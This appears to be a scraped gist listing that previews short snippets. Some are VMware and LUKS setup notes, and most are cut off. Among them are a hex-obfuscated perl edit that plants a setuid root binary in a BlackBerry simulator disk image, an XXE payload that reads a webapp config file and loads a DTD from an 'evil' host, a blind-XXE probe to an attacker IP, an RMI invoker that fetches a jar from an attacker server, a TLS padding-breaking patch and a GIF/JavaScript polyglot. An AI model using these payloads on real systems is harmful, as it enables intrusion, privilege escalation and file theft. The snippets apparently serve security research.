This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [ "$1" != "" ]; then | |
USERNAME=$1 | |
else | |
echo "ERROR: no username supplied" | |
echo "Using current user" | |
USERNAME=`whoami` | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure all kernel headers are installed | |
yum install kernel-devel kernel-headers | |
# Make a copy of version.h to a location known to Vmware | |
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/ | |
#fix vmnet build | |
cd /usr/lib/vmware/modules/source/ | |
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch | |
tar xf vmnet.tar |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vmware-installer -u vmware-player | |
http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#create new file to use as container | |
#dd if=/dev/zero of=/out count=5000k | |
fallocate -l 1G test.img | |
#create luks wrapper | |
cryptsetup -v -y luksFormat /out | |
cryptsetup luksOpen /out cryptname | |
cryptsetup -v status cryptname | |
#make into filesystem |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Payload: | |
<?xml version="1.0" encoding="utf-8"?> | |
<!DOCTYPE root [ | |
<!ENTITY % start "<![CDATA["> | |
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> | |
<!ENTITY % end "]]>"> | |
<!ENTITY % dtd SYSTEM "http://evil/evil.xml"> | |
%dtd; | |
]> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Python implementation of RMI invoker. Should try fetch a .jar from a server we control. | |
Author: Etienne Stalmans <etienne@sensepost.com> | |
Version: 08/10/2014 - v0.1 | |
""" | |
import socket | |
import binascii |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go | |
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100 | |
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000 | |
@@ -301,6 +301,8 @@ | |
// be used. | |
CurvePreferences []CurveID | |
+ BreakCBCPadding bool | |
+ | |
serverInitOnce sync.Once // guards calling (*Config).serverInit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,.. | |
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a | |
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello"); |
OlderNewer